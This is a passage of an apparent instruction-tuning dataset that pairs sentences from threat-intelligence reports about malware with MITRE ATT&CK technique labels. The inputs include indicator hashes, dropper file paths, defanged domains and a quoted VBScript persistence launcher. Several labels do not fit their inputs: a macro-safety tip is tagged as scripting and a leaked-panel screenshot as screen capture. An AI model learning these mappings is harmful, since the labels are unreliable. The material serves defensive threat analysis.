knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Downloader After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 5a0c4e1925c76a959ab0588f683ab437 Size\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 46592 bytes Compile Time\u00a0\u00a0\u00a0 2014-11-19 08:55:10Z Import Hash\u00a0 \u00a0\u00a0\u00a06b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path \u201cC:\\Users\\Public\u201d, which fails on Windows XP because that path is not present by default", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Filename Part-I.doc File Size 11349102 bytes MD5 92942c54224cd462dd201ae11a560bb8 SHA1 85a21624df2211af3daf05c86a3fbea8271059d3 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Filename Part-II.doc File Size 10156713 bytes MD5 e32668e569362c96cc56db368b7e821e SHA1 dadc493abbe3e21610539e1d5a42f523626a6132 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one instance we observed, one of the initial malware delivered to the victim, RATANKBA (TROJ_RATANKBA.A), connects to a legitimate but compromised website (eye-watch[.]in:443, a mobile application-selling site) from which a hack tool (nbt_scan.exe) is also downloaded", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One archive sample analyzed by CTU researchers contained a legitimate PDF file, a benign image of interest to targets (see Figure 8), and an HttpBrowser installer disguised as an image file", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The webshell will save the archives locally to the server in the C:\\Users\\Public\\Libraries\\Recorded\\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"code(2343)\"\", MsgBoxStyle.Critical, null); The dropper then writes the content of the payload which resides as plaintext in a resource within the .NET assembly to C:\\Users\\\\AppData\\Local\\Temp\\SystemDiskClean.ps1\"", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "File starts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unique User-Agents The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command ID 17 indexes to a function that collects the system information and sends it to the C2 server.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "According to the server\u2019s code, the default command that it would issue to newly infected systems was a batch script contained in a file named 0000000000.bat", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files: MD5 Filename d76261ba3b624933a6ebb5dd73758db4 WmiApCom 79b68cdd0044edd4fbf8067b22878644 WmiApCom.bat The \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attackers using Comnie are leveraging malicious macros that initially hide decoy documents and shows them when the victim enables macros", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "VBScript #1 The dropped script \u201c58d2a83f7778d5.36783181.vbs\u201d acts as a launcher", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following are the three files: Defender.sct \u2013 The malicious JavaScript based scriptlet file", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe that this group uses the script to deliver Metasploit\u2019s Meterpreter as a potential payload as well", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Character Description 0 File contains batch commands, it executes the batch commands 1 Rename the temporary file as .ps1 extension 2 Rename the temporary file as .vbs extension Table 2: BONDUPDATER Actions Figure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To run persistently on the system, the Trojan will first create a VBScript file:SpecialFolder.CommonApplicationData\\srvResesponded.vbs that contains:CreateObject(\u201cWScript.Shell\u201d).Run(\u201c%app%\u201d) The Trojan replaces the %app% string in the above VBScript with the path to its executable", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group often uses the trial version of Cobalt Strike, a publicly available commercial software for \u201cAdversary Simulations and Red Team Operations.\u201d Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, \u201ca PowerShell and Python post-exploitation agent.\u201d For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary shellcode", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For that we can use a Python script, included in Appendix B \u2013 Python Scripts", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Essentially, we are discussing ongoing activity revolving around several malware families: KopiLuwak and IcedCoffeer Carbon Mosquito WhiteBear Technical Rattle Turla\u2019s Shifting to Scripting KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The image is downloaded directly, and the shellcode is loaded and executed in memory", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(On the left is NavRAT, and on the right is the shellcode of ROKRAT): We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 3: Script code embedded in 29[.]html used to download and run Revenge RAT The script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3), the only difference being the absence of a sleep command and the usage of the \u201cforfiles\u201d utility", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS).", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach.", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell.", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malware features Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The command handle looks for the following command strings in Table 3: Command Description $fileDownload Uploads the contents of a specified file to C2 $importModule Adds a specified PowerShell module to the current script $screenshot Executes the contents of the command, which should be the string \u2018$screenshot\u2019", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"SpyNote RAT captured the device\u2019s screen activities along with audio using the \u00a0MediaProjectionCallback\u00a0functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named \"\"video.mp4\"\" as shown in the following\u00a0screenshot: Figure 5\u00a0:\u00a0Output\u00a0File SMS stealing\u00a0 SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in screenshot\u00a0below: Figure 6:\u00a0Reading SMS\u00a0messages Stealing\u00a0contacts The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the\u00a0spyware\"", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE 